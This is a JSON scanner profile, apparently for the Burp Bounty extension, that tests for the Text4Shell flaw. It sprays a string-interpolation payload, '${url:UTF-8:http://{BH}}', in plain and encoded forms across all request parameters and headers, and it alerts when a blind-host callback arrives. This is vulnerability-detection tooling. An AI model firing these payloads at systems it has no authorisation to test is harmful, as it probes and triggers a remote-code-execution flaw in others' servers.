[
  {
    "profile_name": "Text4Shell",
    "enabled": true,
    "scanner": "active",
    "author": "@bountysecurity",
    "steps": [
      {
        "request_type": "original",
        "reuse_cookie": false,
        "insertion_point": "same",
        "raw_request": "",
        "payloads": [
          "true,${url:UTF-8:http://{BH}}",
          "true,%24%7Burl%3AUTF-8%3Ahttp%3A%2F%2F%{BH}%7D",
          "true,%24%7Burl%3AUTF-8%3Ahttp%3A%2F%2F%7BBH%7D%7D",
          "true,%24%7b%75%72%6c%3a%55%54%46%2d%38%3a%68%74%74%70%3a%2f%2f%7b%42%48%7d%7d"
        ],
        "payloads_file": "",
        "payload_position": "replace",
        "change_http_request": false,
        "change_http_request_type": "post_to_get",
        "insertion_points": [
          "all",
          "extension_provice",
          "user_agent",
          "entire_body",
          "param_body",
          "param_cookie",
          "param_json",
          "url_path_folder",
          "param_multipart_attr",
          "param_name_body",
          "param_name_url",
          "user_provided",
          "param_url",
          "param_xml",
          "param_xml_attr",
          "url_path_filename",
          "param_name_cookie",
          "param_name_xml",
          "param_name_xml_attr",
          "param_name_multi_part_attr",
          "param_name_json",
          "referer",
          "origin",
          "host",
          "content_type",
          "accept",
          "accept_language",
          "accept_encoding",
          "entire_body_xml",
          "entire_body_json",
          "entire_body_multipart"
        ],
        "header_value": false,
        "new_headers": [],
        "match_replace": [],
        "encoder": [],
        "url_encode": false,
        "chars_to_url_encode": "",
        "greps_file": "",
        "grep": [
          "true,,Blind Host,,"
        ],
        "redir_type": "never",
        "max_redir": 0,
        "show_alert": "always",
        "issue_name": "Text4Shell",
        "issue_severity": "High",
        "issue_confidence": "Certain",
        "issue_detail": "",
        "remediation_detail": "",
        "issue_background": "",
        "remediation_background": ""
      }
    ],
    "Tags": [
      "All"
    ]
  }
]